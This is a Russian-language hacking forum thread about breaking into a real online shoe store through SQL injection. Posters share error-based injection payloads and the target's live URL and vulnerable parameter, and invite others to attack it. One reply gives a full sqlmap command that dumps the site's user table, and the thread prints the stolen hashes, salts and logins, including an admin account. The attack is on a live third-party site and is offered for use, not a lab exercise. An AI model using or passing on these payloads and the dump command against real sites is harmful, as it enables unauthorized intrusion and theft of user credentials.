Здравствуйте, коллеги Вообщем недавно решил помимо разработки сайтов научиться взламывать сайты. Нарыл один интересный интернет-магазин, и сразу же нашел SQL инъекцию. Вообщем что только не придумывал, и union прописывал и т.д. Вылетает одна и та же хрень, ошибка синтаксиса. Инъекция работает если ставить " кавычку. Какие еще могут быть варианты для взлома?
Пробуйте error based вектор. например: 'or(ExtractValue(1,concat(0x3a,(select(version())))))='1 или '-updatexml(0,repeat(version(),2),2)#
да все равно, кто нашел, тот молодец. Сайт я взломать пытаюсь не для корыстной цели, а для практики. ----------------------------------
Вообщем кому интересно ломануть сайтик, а потом рассказать (поделиться опытом), как это сделал, вот ссыль - http://xn--80abd6ar5a2c.xn--p1ai/ Инъекция - http://xn--80abd6ar5a2c.xn--p1ai/shop/product/filter?productFilter[_ef][gender][]=Мужская"
Убери одну скобку в запросе. ")))||1+group+by+concat(version(),floor(rand(0)*2))having+min(0)%23 Надо ошибки тоже читать.
base: w106051 Table: user [5 entries] +----------------------+---------------+-------------------------------+-------------+ | email | password | salt | login | +----------------------+---------------+-------------------------------+-------------+ | @ya.ru | $2nWSDmGDU.V6 | $2a$14$2JzmyFg/HuG55/xYBrIXMA | delvin | | @altlogic.ru | $22dAubujSFfU | $2a$14$EnpIvtkw.xRbLRzjwbquxg | admin | | @mail.ru | $2JpCew0SKvc. | $2a$14$ltDzAFvK5i0qU33i2nvaPg | durova_vita | | @tagan.ru | $24LkUVLWIjU2 | $2a$14$tk2uQd0jCUpmApJ6kmSB/g | dmi | | @gmail.com | $2KvStv//sqiM | $2a$14$VNPbpZZMDzNBW8Lt9JD6dw | obuvka | +----------------------+---------------+-------------------------------+-------------+ sqlmap -u "http://обувъка.рф/shop/product/filter?productFilter[_ef][gender][]="*" --dbms Mysql --time-sec 10 --threads 10 --level 3 --risk 3 --technique E -D w106051 -T user -C email,password,salt,login --dump
зачем изобретать велосипед? есть софт он работает по логу можно понять что происходит а вот если автоматизация не прокатила то да имеет смысл копать руками! п.с. имхо